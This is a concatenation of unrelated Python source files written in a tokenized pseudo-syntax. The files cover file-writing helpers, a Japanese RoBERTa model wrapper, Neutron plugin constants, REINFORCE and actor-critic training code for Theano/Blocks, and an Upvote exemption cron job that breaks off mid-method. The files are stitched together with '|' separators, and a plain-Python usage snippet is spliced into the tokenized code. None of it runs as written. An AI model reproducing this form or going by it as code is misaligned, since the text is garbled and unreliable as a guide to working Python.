Returns the directory path"""<line_sep>dir=os.path.dirname(fname)<if_stmt>len(dir)<g>0<block_start>ensureDir(dir)<line_sep><return>dir<block_end><else_stmt><block_start><return>"."<block_end><block_end><def_stmt>prLine fh *objs<block_start>"write each str(obj) followed by a newline"<for_stmt>o objs<block_start>fh.write(str(o))<block_end>fh.write("\n")<block_end><def_stmt>prStrs fh *objs<block_start>"write each str(obj), with no newline"<for_stmt>o objs<block_start>fh.write(str(o))<block_end><block_end><def_stmt>prRow fh row<block_start>"""Print a row (list or tuple) to a tab file.
Does string conversion on each column"""<line_sep>first=<true><for_stmt>col row<block_start><if_stmt><not>first<block_start>fh.write("\t")<block_end>fh.write(str(col))<line_sep>first=<false><block_end>fh.write("\n")<block_end><def_stmt>prRowv fh *objs<block_start>"""Print a row from each argument to a tab file.
Does string conversion on each column"""<line_sep>first=<true><for_stmt>col objs<block_start><if_stmt><not>first<block_start>fh.write("\t")<block_end>fh.write(str(col))<line_sep>first=<false><block_end>fh.write("\n")<block_end>
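# Hedged usage sketch (illustration only): write a tiny tab-separated file with the
# helpers above; the output path is an arbitrary placeholder.
if __name__ == "__main__":
    outPath = "output/example.tsv"
    ensureFileDir(outPath)
    with open(outPath, "w") as fh:
        prRowv(fh, "name", "count")
        prRow(fh, ["widget", 3])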
# Copyright (c) Facebook, Inc., its affiliates and Kakao Brain. All Rights Reserved
<import_from_stmt>typing Dict Union<import_stmt>torch<import_from_stmt>fairseq.models.roberta RobertaModel<import_from_stmt>fairseq.models.roberta.hub_interface RobertaHubInterface<import_from_stmt>transformers BertJapaneseTokenizer<import_from_stmt>pororo.models.brainbert.utils softmax<import_from_stmt>pororo.tasks.utils.download_utils download_or_load<class_stmt>JabertaModel(RobertaModel)<block_start>@classmethod<def_stmt>load_model cls model_name:str lang:str **kwargs<block_start>"""
Load pre-trained model as RobertaHubInterface.
:param model_name: model name from available_models
:return: pre-trained model
"""<import_from_stmt>fairseq hub_utils<line_sep>ckpt_dir=download_or_load(model_name lang)<line_sep>x=hub_utils.from_pretrained(ckpt_dir "model.pt" load_checkpoint_heads=<true> **kwargs )<line_sep><return>JabertaHubInterface(x["args"] x["task"] x["models"][0])<block_end><block_end><class_stmt>JabertaHubInterface(RobertaHubInterface)<block_start><def_stmt>__init__ self args task model<block_start>super().__init__(args task model)<try_stmt><block_start><import_stmt>ipadic# noqa
<block_end><except_stmt>ImportError<block_start><raise>ImportError("Please install ipadic with: `pip install ipadic`")<block_end><try_stmt><block_start><import_stmt>fugashi# noqa
<block_end><except_stmt>ImportError<block_start><raise>ImportError("Please install fugashi with: `pip install fugashi`")<block_end>self.bpe=BertJapaneseTokenizer.from_pretrained("cl-tohoku/bert-base-japanese-whole-word-masking")<block_end><def_stmt>tokenize self sentence:str add_special_tokens:bool=<false><block_start>result=" ".join(self.bpe.tokenize(sentence)[:510])<if_stmt>add_special_tokens<block_start>result=f"<s> {result} </s>"<block_end><return>result<block_end><def_stmt>encode self sentence:str *addl_sentences add_special_tokens:bool=<true> no_separator:bool=<false> return_bpe:bool=<false> <arrow>torch.LongTensor<block_start>bpe_sentence=self.tokenize(sentence add_special_tokens=add_special_tokens )<for_stmt>s addl_sentences<block_start>bpe_sentence<augadd>" </s>"<if><not>no_separator<and>add_special_tokens<else>""<line_sep>bpe_sentence<augadd>(" "+self.tokenize(s add_special_tokens=<false>)+" </s>"<if>add_special_tokens<else>"")<block_end>tokens=self.task.source_dictionary.encode_line(bpe_sentence append_eos=<false> add_if_not_exist=<false> )<if_stmt>return_bpe<block_start><return>tokens.long() bpe_sentence.split()[1:-1]<block_end><return>tokens.long()<block_end><def_stmt>fill_mask self masked_input:str topk:int=5<block_start>masked_token="__"<assert_stmt>(masked_token<in>masked_input<and>masked_input.count(masked_token)<eq>1) "Please add one {0} token for the input, eg: 'He is a {0} guy'".format(masked_token)<line_sep>text_spans=masked_input.split(masked_token)<line_sep>text_spans_bpe=((" {0} ".format("<mask>")).join([" ".join(self.bpe.tokenize(text_span.rstrip()))<for>text_span text_spans]).strip())<line_sep>tokens=self.task.source_dictionary.encode_line("<s> "+text_spans_bpe+" </s>" append_eos=<false> add_if_not_exist=<false> )<line_sep>masked_index=torch.nonzero(tokens<eq>self.task.mask_idx as_tuple=<false> )<if_stmt>tokens.dim()<eq>1<block_start>tokens=tokens.unsqueeze(0)<block_end><with_stmt>torch.no_grad()<block_start>features,_=self.model(tokens.long().to(device=self.device) features_only=<false> return_all_hiddens=<false> )<block_end>logits=features[0 masked_index :].squeeze()<line_sep>prob=logits.softmax(dim=0)<line_sep>_,index=prob.topk(k=topk dim=0)<line_sep>topk_predicted_token_bpe=self.task.source_dictionary.string(index)<line_sep><return>[bpe.replace("##" "")<for>bpe topk_predicted_token_bpe.split()]<block_end>@torch.no_grad()<def_stmt>predict_output self sentence:str *addl_sentences add_special_tokens:bool=<true> no_separator:bool=<false> show_probs:bool=<false> <arrow>Union[str Dict]<block_start><assert_stmt>("sentence_classification_head"<in>self.model.classification_heads) "need pre-trained sentence_classification_head to make predictions"<line_sep>tokens=self.encode(sentence *addl_sentences add_special_tokens=add_special_tokens no_separator=no_separator )<with_stmt>torch.no_grad()<block_start>prediction=self.predict("sentence_classification_head" tokens return_logits=self.args.regression_target )<if_stmt>self.args.regression_target<block_start><return>prediction.item()<block_end># float
label_fn=<lambda>label:self.task.label_dictionary.string([label+self.task.label_dictionary.nspecial])<if_stmt>show_probs<block_start>probs=softmax(prediction.cpu().numpy())<line_sep>probs=probs.tolist()<line_sep>probs={label_fn(i):prob<for>i,prob enumerate(probs)}<line_sep><return>probs<block_end><block_end><return>label_fn(prediction.argmax().item())<block_end># str
@torch.no_grad()<def_stmt>predict_tags self sentence:str no_separator:bool=<false><block_start>label_fn=<lambda>label:self.task.label_dictionary.string([label])<line_sep>tokens,words=self.encode(sentence no_separator=no_separator return_bpe=<true> )<line_sep># Get first batch and ignore <s> & </s> tokens
preds=(self.predict("sequence_tagging_head" tokens )[0 1:-1 :].argmax(dim=1).cpu().numpy())<line_sep>labels=[label_fn(int(pred)+self.task.label_dictionary.nspecial)<for>pred preds]<line_sep><return>[(word label)<for>word,label zip(words labels)]<block_end><block_end> |
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
<import_from_stmt>neutron_lib.plugins constants<as>p_const<line_sep># Maps extension alias to service type that
# can be implemented by the core plugin.
EXT_TO_SERVICE_MAPPING={'fwaas':p_const.FIREWALL 'vpnaas':p_const.VPN 'metering':p_const.METERING 'router':p_const.L3 'qos':p_const.QOS }<line_sep># Maps default service plugins entry points to their extension aliases
DEFAULT_SERVICE_PLUGINS={'auto_allocate':'auto-allocated-topology' 'tag':'tag' 'timestamp':'timestamp' 'network_ip_availability':'network-ip-availability' 'flavors':'flavors' 'revisions':'revisions' }<line_sep> |
<import_stmt>logging<import_stmt>theano<import_from_stmt>theano.gradient disconnected_grad<import_from_stmt>theano tensor<import_from_stmt>blocks.graph ComputationGraph<import_from_stmt>blocks.filter VariableFilter<import_from_stmt>blocks.bricks Linear NDimensionalSoftmax<import_from_stmt>blocks.bricks.base application<import_from_stmt>blocks.roles OUTPUT add_role WEIGHT<import_from_stmt>blocks.utils dict_subset shared_floatx_nans<import_from_stmt>blocks_extras.bricks.sequence_generator2 SoftmaxReadout MergeReadout<line_sep>logger=logging.getLogger(__name__)<class_stmt>ReinforceReadout(SoftmaxReadout)<block_start><def_stmt>__init__ self reward_brick entropy=<none> **kwargs<block_start>super(ReinforceReadout self).__init__(**kwargs)<line_sep>self.reward_brick=reward_brick<line_sep>self.entropy_coof=entropy<line_sep>self.value_prediction=Linear(output_dim=1 name='value_prediction')<line_sep>self.children<augadd>[reward_brick self.value_prediction]<line_sep>self.costs.inputs<augadd>['attended' 'attended_mask']<block_end><def_stmt>_push_allocation_config self<block_start>super(ReinforceReadout self)._push_allocation_config()<line_sep>self.value_prediction.input_dim=self.get_dim('states')<block_end>@application<def_stmt>costs self application_call prediction prediction_mask groundtruth groundtruth_mask **inputs<block_start>states=disconnected_grad(inputs['states'])<line_sep>merged=self.merge(**dict_subset(inputs self.merge_names))<line_sep># Compute log-probabilities for the predicted tokens
log_probs=-self.all_scores(prediction merged)<times>prediction_mask<line_sep># Compute per-token rewards
rewards=self.reward_brick.apply(prediction prediction_mask groundtruth groundtruth_mask).sum(axis=-1)<line_sep># Encourage entropy by adding negated log-probs to the rewards
application_call.add_auxiliary_variable(log_probs name='log_probs')<if_stmt>self.entropy_coof<block_start>rewards<augadd>self.entropy_coof<times>disconnected_grad(-log_probs)<block_end>future_rewards=rewards[::-1].cumsum(axis=0)[::-1]<line_sep>baselines=self.value_prediction.apply(states)[: : 0]<line_sep>application_call.add_auxiliary_variable(baselines name='baselines')<line_sep># Compute baseline error
centered_future_rewards=future_rewards-baselines<line_sep>baseline_errors=((centered_future_rewards<times>disconnected_grad(prediction_mask))<power>2).sum(axis=0)<line_sep>application_call.add_auxiliary_variable(baseline_errors name='baseline_errors')<line_sep># The gradient of this will be the REINFORCE 1-sample
# gradient estimate
costs=(disconnected_grad(centered_future_rewards)<times>log_probs<times>prediction_mask).sum(axis=0)<line_sep># Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(rewards name='rewards')<line_sep>application_call.add_auxiliary_variable(log_probs.copy() name='prediction_log_probs')<line_sep><return>costs<block_end><block_end><class_stmt>CriticReadout(MergeReadout)<block_start><def_stmt>__init__ self num_tokens value_softmax=<false> same_value_for_wrong=<false> groundtruth_word_bonus=<false> dueling_outputs=<false> **kwargs<block_start>self.value_softmax=value_softmax<line_sep>self.same_value_for_wrong=same_value_for_wrong<line_sep>self.groundtruth_word_bonus=groundtruth_word_bonus<line_sep>self.dueling_outputs=dueling_outputs<line_sep>super(CriticReadout self).__init__(post_merge_dim=num_tokens **kwargs)<line_sep>self.costs.inputs=(['prediction' 'prediction_mask' 'groundtruth' 'groundtruth_mask']+self.input_names)<block_end><def_stmt>_allocate self<block_start>w=shared_floatx_nans((self.get_dim('states') ) name='add_weights')<line_sep>add_role(w WEIGHT)<line_sep>self.parameters.append(w)<block_end><def_stmt>_initialize self<block_start>self.weights_init.initialize(self.parameters[0] self.rng)<block_end># For compatibility with Blocks-extras
<def_stmt>sample self<block_start><raise>NotImplementedError()<block_end># For compatibility with Blocks-extras
<def_stmt>scores self<block_start><pass><block_end>@application<def_stmt>costs self prediction prediction_mask groundtruth groundtruth_mask **inputs<block_start>outputs=self.all_outputs(groundtruth groundtruth_mask **inputs)<line_sep># It does not matter what we return here, as long as it contains
# the values in the computation graph.
<return>outputs.sum()<block_end>@application<def_stmt>all_outputs self application_call groundtruth groundtruth_mask **inputs<block_start>outputs=self.merge(**dict_subset(inputs self.merge_names))<line_sep>indices=tensor.repeat(tensor.arange(groundtruth.shape[1]) groundtruth.shape[0])<if_stmt>self.value_softmax<block_start>logger.debug('Applying value softmax')<line_sep>outputs=(tensor.addbroadcast(outputs[: : :1] 2)+self.softmax.apply(outputs[: : 1:] extra_ndim=1))<block_end><if_stmt>self.same_value_for_wrong<block_start>logger.debug('Same value for apriori wrong actions')<line_sep>wrong_output=outputs[: : 0]<line_sep>outputs=outputs[: : 1:]<line_sep>wrong_mask=tensor.ones_like(outputs[0])<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>outputs=(outputs<times>(1-wrong_mask)+wrong_output[: : <none>]<times>wrong_mask)<line_sep>application_call.add_auxiliary_variable(wrong_mask name='wrong_mask')<block_end><if_stmt>self.groundtruth_word_bonus<block_start>logger.debug('Bonus for grondtruth words')<line_sep>wrong_mask=tensor.ones_like(outputs[0])<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>w,=self.parameters<line_sep>bonuses=inputs['states'].dot(w)<line_sep>outputs<augadd>bonuses[: : <none>]<times>(1-wrong_mask)[<none> : :]<block_end><if_stmt>self.dueling_outputs<block_start>logger.debug('Dueling outputs a-la dueling networks')<line_sep>base_output=outputs[: : [0]]<line_sep>dueling_outputs=outputs[: : 1:]<line_sep>outputs=base_output+dueling_outputs-dueling_outputs.mean(axis=2 keepdims=<true>)<block_end><return>outputs<block_end>@application<def_stmt>outputs self groundtruth groundtruth_mask **inputs# Copy-pasted from all_outputs, because Theano does not support ellipsis
<block_start>outputs=self.merge(**dict_subset(inputs self.merge_names))<line_sep>indices=tensor.repeat(tensor.arange(groundtruth.shape[1]) groundtruth.shape[0])<if_stmt>self.value_softmax<block_start>logger.debug('Applying value softmax')<line_sep>outputs=(tensor.addbroadcast(outputs[: :1] 1)+self.softmax.apply(outputs[: 1:]))<block_end><if_stmt>self.same_value_for_wrong<block_start>logger.debug('Same value for apriori wrong actions')<line_sep>wrong_output=outputs[: 0]<line_sep>outputs=outputs[: 1:]<line_sep>wrong_mask=tensor.ones_like(outputs)<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>outputs=(outputs<times>(1-wrong_mask)+wrong_output[: <none>]<times>wrong_mask)<block_end><if_stmt>self.groundtruth_word_bonus<block_start>logger.debug('Bonus for grondtruth words')<line_sep>wrong_mask=tensor.ones_like(outputs)<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>w,=self.parameters<line_sep>bonuses=inputs['states'].dot(w)<line_sep>outputs=outputs+bonuses[: <none>]<times>(1-wrong_mask)<block_end><if_stmt>self.dueling_outputs<block_start>logger.debug('Dueling outputs a-la dueling networks')<line_sep>base_output=outputs[: [0]]<line_sep>dueling_outputs=outputs[: 1:]<line_sep>outputs=base_output+dueling_outputs-dueling_outputs.mean(axis=1 keepdims=<true>)<block_end><return>outputs<block_end><block_end><class_stmt>ActorCriticReadout(SoftmaxReadout)<block_start>"""Actor-critic
Parameters
----------
bos_token : int
The token used to pad the critic input. The critic needs to do
at least one extra step compared to the actor in order
to get the first glimpse of the ground-truth sequence
before predicting the actual values.
"""<def_stmt>__init__ self reward_brick compute_targets solve_bellman freeze_actor freeze_critic critic_uses_actor_states critic_uses_groundtruth critic=<none> critic_burnin_steps=<none> critic_loss=<none> critic_policy_t=<none> entropy_reward_coof=<none> cross_entropy_reward_coof=<none> trpo_coef=<none> discount=<none> value_penalty=<none> value_penalty_type=<none> accumulate_outputs=<false> use_value_biases=<none> actor_grad_estimate=<none> bos_token=<none> **kwargs<block_start>super(ActorCriticReadout self).__init__(**kwargs)<line_sep>self.reward_brick=reward_brick<line_sep>self.critic=critic<line_sep>self.freeze_actor=freeze_actor<line_sep>self.freeze_critic=freeze_critic<line_sep>self.critic_uses_actor_states=critic_uses_actor_states<line_sep>self.critic_uses_groundtruth=(critic_uses_groundtruth<if>critic_uses_groundtruth<is><not><none><else><true>)<line_sep>self.critic_burnin_steps=(critic_burnin_steps<if>critic_burnin_steps<is><not><none><else>0)<line_sep>self.critic_loss=(critic_loss<if>critic_loss<is><not><none><else>"L2")<line_sep>self.value_summand=Linear(output_dim=1 name='summand')<line_sep>self.softmax_t=1.<line_sep>self.critic_policy_t=(critic_policy_t<if>critic_policy_t<is><not><none><else>1.0)<line_sep>self.epsilon=0.<line_sep>self.discount=(discount<if>discount<is><not><none><else>1.)<line_sep>self.entropy_reward_coof=(entropy_reward_coof<if>entropy_reward_coof<is><not><none><else>0.)<line_sep>self.cross_entropy_reward_coof=(cross_entropy_reward_coof<if>cross_entropy_reward_coof<is><not><none><else>0.)<line_sep>self.trpo_coef=(trpo_coef<if>trpo_coef<is><not><none><else>0.)<line_sep>self.value_penalty=value_penalty<line_sep>self.value_penalty_type=(value_penalty_type<if>value_penalty_type<is><not><none><else>"L2")<line_sep>self.compute_targets=compute_targets<line_sep>self.solve_bellman=solve_bellman<line_sep>self.accumulate_outputs=accumulate_outputs<line_sep>self.use_value_biases=(use_value_biases<if>use_value_biases<is><not><none><else><true>)<line_sep>self.actor_grad_estimate=(actor_grad_estimate<if>actor_grad_estimate<else>'all_actions')<line_sep>self.bos_token=bos_token<line_sep>self.softmax=NDimensionalSoftmax()<line_sep>self.children<augadd>[reward_brick self.value_summand self.softmax]<if_stmt>self.critic<block_start>self.children.append(self.critic)<block_end>self.costs.inputs<augadd>['attended' 'attended_mask']<block_end><def_stmt>_push_allocation_config self<block_start>super(ActorCriticReadout self)._push_allocation_config()<line_sep>self.value_summand.input_dim=self.get_dim('attended')<block_end>@application<def_stmt>scores self **inputs<block_start>merged=self.merge(**dict_subset(inputs self.merge_names))<line_sep><return>self.softmax.log_probabilities(merged<times>self.softmax_t extra_ndim=merged.ndim-2)<block_end>@application<def_stmt>costs self application_call prediction prediction_mask groundtruth groundtruth_mask **inputs<block_start><def_stmt>_prediction_subtensor data<block_start><if_stmt>data.ndim<ne>3<block_start><raise>ValueError<block_end>flat_data=data.reshape((data.shape[0]<times>data.shape[1] data.shape[2]))<line_sep>flat_data=flat_data[tensor.arange(flat_data.shape[0]) prediction.flatten()]<line_sep><return>flat_data.reshape((prediction.shape[0] prediction.shape[1]))<block_end>attended=disconnected_grad(inputs.pop('attended'))<line_sep>attended_mask=disconnected_grad(inputs.pop('attended_mask'))<line_sep># Compute the rewards
rewards=self.reward_brick.apply(prediction prediction_mask groundtruth groundtruth_mask)[: : 0]<line_sep>future_rewards=rewards[::-1].cumsum(axis=0)[::-1]<line_sep># Compute the critic outputs
<if_stmt>self.critic<block_start>padding=tensor.repeat(tensor.fill(prediction[0:1] self.bos_token) 1 axis=0)<line_sep>mask_padding=tensor.repeat(tensor.fill(prediction_mask[0:1] 1.) 1 axis=0)<line_sep>padded_prediction=tensor.concatenate([padding prediction])<line_sep>padded_prediction_mask=tensor.concatenate([mask_padding prediction_mask])<if_stmt>self.critic_uses_groundtruth<block_start>critic_context=groundtruth<line_sep>critic_context_mask=groundtruth_mask<block_end><else_stmt><block_start>critic_context=tensor.zeros_like(groundtruth[0:1])<line_sep>critic_context_mask=tensor.zeros_like(groundtruth_mask[0:1])<block_end>critic_kwargs=dict(prediction=padded_prediction prediction_mask=padded_prediction_mask groundtruth=critic_context groundtruth_mask=critic_context_mask inputs=critic_context inputs_mask=critic_context_mask)<if_stmt>self.critic_uses_actor_states<block_start>extra_inputs=disconnected_grad(inputs['states'])<line_sep># We don't need the very last hidden state of the actor
# in extra_inputs. We have to add something instead for the shapes
# to match. It doesn't matter at all what exactly we add.
critic_kwargs['extra_inputs']=tensor.concatenate([extra_inputs tensor.zeros_like(extra_inputs[0:1])])<block_end>critic_cg=ComputationGraph(self.critic.costs(**critic_kwargs))<line_sep>outputs,=VariableFilter(applications=[self.critic.generator.readout.all_outputs] roles=[OUTPUT])(critic_cg)<line_sep># The first subtensor should be discarded, because it was outputted
# for the padding. In addition to that, Q-values from the first
# 'critic_burnin_steps' will be ignored; see later in the code.
outputs=outputs[1:]<block_end><else_stmt><block_start>outputs=self.merge(**dict_subset(inputs self.merge_names))<block_end>prediction_outputs=_prediction_subtensor(outputs)<line_sep># Compute Q adjustments
adjustments=outputs<line_sep>prediction_adjustments=prediction_outputs<if_stmt>self.accumulate_outputs<block_start>prediction_adjustments=prediction_outputs.cumsum(axis=0)<line_sep>adjustments=tensor.inc_subtensor(adjustments[1:] prediction_adjustments[:-1][: : <none>])<block_end># Compute shared additive biases for all Q values
<if_stmt>self.use_value_biases<block_start>value_biases=(self.value_summand.apply(attended)[: : 0]<times>attended_mask).sum(axis=0)<block_end><else_stmt><block_start>value_biases=tensor.zeros_like(adjustments[0 : 0])<block_end>values=adjustments+value_biases[<none> : <none>]<line_sep>prediction_values=prediction_adjustments+value_biases[<none> :]<line_sep>rolled_prediction_mask=tensor.roll(prediction_mask -1 axis=0)<line_sep>rolled_prediction_mask=tensor.set_subtensor(rolled_prediction_mask[-1] 0)<line_sep># Compute probabilities
logs=self.scores(use_epsilon=<false> **inputs)<line_sep>probs=tensor.exp(logs)<if_stmt>self.trpo_coef<block_start>logger.debug("Using TRPO coefficient of {}".format(self.trpo_coef))<line_sep>old_probs=tensor.tensor3('probs')<block_end><else_stmt><block_start>old_probs=tensor.zeros_like(probs)<block_end>prediction_logs=_prediction_subtensor(logs)<line_sep># Compute value targets
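# (an expected-SARSA style target: r_t + discount * sum_a pi(a|s_{t+1}) * Q(s_{t+1}, a),
# with the policy probabilities treated as constants)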
value_targets=(disconnected_grad(probs)<times>values).sum(axis=-1)<line_sep>value_targets=tensor.roll(value_targets -1 axis=0)<line_sep>value_targets=(self.discount<times>value_targets<times>rolled_prediction_mask+rewards)<line_sep>value_targets=value_targets.astype(theano.config.floatX)<line_sep>total_costs=0<line_sep># Compute critic cost
<if_stmt><not>self.compute_targets<block_start>logger.debug("Using given targets")<line_sep>value_targets=tensor.matrix('value_targets')<block_end><if_stmt>self.solve_bellman<eq>'no'<block_start>logger.debug("Not solving Bellman, just predicting the rewards")<line_sep>value_targets=rewards.copy(name='value_targets')<block_end><elif_stmt>self.solve_bellman<eq>'without_dp'<block_start>future_rewards=rewards[::-1].cumsum(axis=0)[::-1]<line_sep>logger.debug("Solving Bellman, but without DP")<line_sep>value_targets=future_rewards<block_end><elif_stmt>self.solve_bellman<is><not><true><block_start><raise>ValueError()<block_end>critic_errors=prediction_values-value_targets<if_stmt>self.critic_loss<eq>'L2'<block_start>logger.debug("L2 loss for the critic")<line_sep>critic_costs_per_char=critic_errors<power>2<times>prediction_mask<block_end><elif_stmt>self.critic_loss<eq>'huber'<block_start>logger.debug("Huber loss for the critic")<line_sep>use_L2=tensor.lt(abs(critic_errors) 0.5)<line_sep>critic_costs_per_char=(use_L2<times>critic_errors<power>2+(1-use_L2)<times>abs(critic_errors))<times>prediction_mask<block_end><else_stmt><block_start><raise>ValueError()<block_end>critic_costs=critic_costs_per_char[self.critic_burnin_steps:].sum(axis=0)<if_stmt><not>self.freeze_critic<block_start>total_costs<augadd>critic_costs<block_end># Compute critic Monte-Carlo cost
critic_monte_carlo_costs=((((prediction_values-future_rewards)<power>2)<times>prediction_mask)[self.critic_burnin_steps:].sum(axis=0))<line_sep># Value penalty
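# (penalizes the deviation of each action's value from the mean value at that step)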
<if_stmt>self.value_penalty<block_start>logger.debug("Use value penalty")<if_stmt>self.value_penalty_type<eq>'L2'<block_start>value_deviations=(values-values.mean(axis=-1 keepdims=<true>))<power>2<block_end><elif_stmt>self.value_penalty_type<eq>'L1'<block_start>value_deviations=abs(values-values.mean(axis=-1 keepdims=<true>))<block_end><else_stmt><block_start><raise>ValueError("unknown value penalty type {}".format(self.value_penalty_type))<block_end><if_stmt><not>self.freeze_critic<block_start>total_costs<augadd>(self.value_penalty<times>(value_deviations.sum(axis=-1)<times>prediction_mask)[self.critic_burnin_steps:].sum(axis=0))<block_end><block_end># Compute actor cost
<if_stmt>self.critic# The actor cost will be minimized, which is why the values
# must be negated.
<block_start>est_name=self.actor_grad_estimate<if_stmt>est_name<eq>'all_actions'<block_start>disadvantages=disconnected_grad(values.max(axis=-1)[: : <none>]-values)<line_sep>actor_costs=((probs<times>disadvantages).sum(axis=-1)<times>prediction_mask)<line_sep>actor_costs=actor_costs[self.critic_burnin_steps:]<block_end><elif_stmt>est_name.startswith('1_action')# Here we do not provide a target for the first step for
# the reason we lack an estimate of the value of the initial state.
# This is how our critic works.
# Hopefully the network won't unlearn
# to produce a BOS first.
<block_start>future_reward_estimate=(future_rewards<if>est_name.endswith('unbiased')<else>prediction_values)<line_sep>weights=-disconnected_grad(future_reward_estimate[1:]+rewards[:-1]-prediction_values[:-1])<line_sep>actor_costs=((prediction_logs[1:]<times>weights)<times>prediction_mask[1:])<line_sep>actor_costs=actor_costs[self.critic_burnin_steps+1:]<block_end><else_stmt><block_start><raise>ValueError<block_end>actor_costs=actor_costs.sum(axis=0)<line_sep>actor_entropies=(probs<times>-logs).sum(axis=-1)<times>prediction_mask<line_sep>actor_entropies=actor_entropies[self.critic_burnin_steps:].sum(axis=0)<line_sep>old_actor_cross_entropies=(old_probs<times>-logs).sum(axis=-1)<times>prediction_mask<line_sep>old_actor_cross_entropies=old_actor_cross_entropies[self.critic_burnin_steps:].sum(axis=0)<line_sep>critic_policy=disconnected_grad(self.softmax.apply(self.critic_policy_t<times>values extra_ndim=1))<line_sep>critic_cross_entropies=((critic_policy<times>-logs).sum(axis=-1)<times>prediction_mask)<line_sep>critic_cross_entropies=critic_cross_entropies[self.critic_burnin_steps:].sum(axis=0)<line_sep>actor_costs_with_penalties=(actor_costs-self.entropy_reward_coof<times>actor_entropies# But really, should it be minus here, below?
-self.cross_entropy_reward_coof<times>critic_cross_entropies+self.trpo_coef<times>old_actor_cross_entropies)<if_stmt><not>self.freeze_actor<block_start>total_costs<augadd>actor_costs_with_penalties<block_end><else_stmt><block_start>total_costs<augadd>disconnected_grad(actor_costs_with_penalties)<block_end><block_end># Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(rewards name='rewards')<line_sep>application_call.add_auxiliary_variable(value_biases name='value_biases')<line_sep>application_call.add_auxiliary_variable(values.copy() name='values')<line_sep>application_call.add_auxiliary_variable(outputs.copy() name='outputs')<line_sep>application_call.add_auxiliary_variable(prediction_values name='prediction_values')<line_sep>application_call.add_auxiliary_variable(prediction_outputs name='prediction_outputs')<line_sep>application_call.add_auxiliary_variable(value_targets.copy() name='value_targets')<line_sep>application_call.add_auxiliary_variable(probs.copy() name='probs')<line_sep>application_call.add_auxiliary_variable(prediction_logs name='prediction_log_probs')<line_sep># Compute some statistics for debugging
last_character_mask=prediction_mask-rolled_prediction_mask<line_sep>last_character_costs=(critic_costs_per_char<times>last_character_mask).sum(axis=0)<line_sep>mean2_output=(((prediction_outputs<power>2)<times>prediction_mask).sum()/prediction_mask.sum())<power>0.5<line_sep>max_output=abs(prediction_outputs<times>prediction_mask).max()<line_sep>expected_reward=(probs[0]<times>values[0]).sum(axis=-1)<line_sep>application_call.add_auxiliary_variable(last_character_costs name='last_character_costs')<line_sep>application_call.add_auxiliary_variable(critic_costs.mean() name='mean_critic_cost')<line_sep>application_call.add_auxiliary_variable(critic_monte_carlo_costs.mean() name='mean_critic_monte_carlo_cost')<if_stmt>self.critic<block_start>application_call.add_auxiliary_variable(actor_costs.mean() name='mean_actor_cost')<line_sep>application_call.add_auxiliary_variable(actor_entropies.mean() name='mean_actor_entropy')<block_end>application_call.add_auxiliary_variable(expected_reward.mean() name='mean_expected_reward')<line_sep>application_call.add_auxiliary_variable(mean2_output name='mean2_output')<line_sep>application_call.add_auxiliary_variable(max_output name='max_output')<line_sep><return>total_costs<block_end><block_end> |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cron jobs which perform various Exemption maintenance tasks."""<import_stmt>datetime<import_stmt>logging<import_stmt>webapp2<import_from_stmt>webapp2_extras routes<import_from_stmt>google.appengine.ext deferred<import_from_stmt>upvote.gae.datastore.models exemption<as>exemption_models<import_from_stmt>upvote.gae.datastore.models utils<as>model_utils<import_from_stmt>upvote.gae.lib.exemption api<as>exemption_api<import_from_stmt>upvote.gae.lib.exemption notify<import_from_stmt>upvote.gae.lib.exemption monitoring<import_from_stmt>upvote.gae.utils env_utils<import_from_stmt>upvote.gae.utils group_utils<import_from_stmt>upvote.gae.utils handler_utils<import_from_stmt>upvote.gae.utils user_utils<import_from_stmt>upvote.shared constants<line_sep># Done for the sake of brevity.
EXEMPTION_STATE=constants.EXEMPTION_STATE<class_stmt>ProcessExemptions(handler_utils.CronJobHandler)<block_start>"""Handler for processing exemptions."""<def_stmt>get self<block_start>logging.info('Processing Exemptions...')<line_sep>exm_query=exemption_models.Exemption.query(exemption_models.Exemption.state<eq>EXEMPTION_STATE.REQUESTED)<line_sep>exm_count=0<for_stmt>exm exm_query<block_start>deferred.defer(exemption_api.Process exm.key _queue=constants.TASK_QUEUE.EXEMPTIONS)<line_sep>exm_count<augadd>1<block_end>monitoring.requested_exemptions.Set(exm_count)<line_sep>logging.info('Deferred %d Exemption(s) for processing' exm_count)<block_end><block_end><def_stmt>_NotifyExpirationsInRange start_dt end_dt<block_start>"""Sends an email for all APPROVED Exemptions that expire in the given range.
Args:
start_dt: The starting datetime of the expiration window.
end_dt: The ending datetime of the expiration window.
"""<line_sep># Query for the Keys of all Exemptions that expire in the given range.
exm_query=exemption_models.Exemption.query(exemption_models.Exemption.state<eq>EXEMPTION_STATE.APPROVED exemption_models.Exemption.deactivation_dt<ge>start_dt exemption_models.Exemption.deactivation_dt<l>end_dt)<line_sep>exm_keys=exm_query.fetch(keys_only=<true>)<for_stmt>exm_key exm_keys<block_start>notify.SendExpirationEmail(exm_key)<block_end><block_end><class_stmt>NotifyUpcomingExpirations(handler_utils.CronJobHandler)<block_start>"""Handler for notifying users of upcoming exemption expirations."""<def_stmt>get self<block_start>now=datetime.datetime.utcnow()<line_sep># Notify all users whose Exemptions now have less than a week left, in order
# to give reasonable advance warning (e.g. long weekends, holidays, etc).
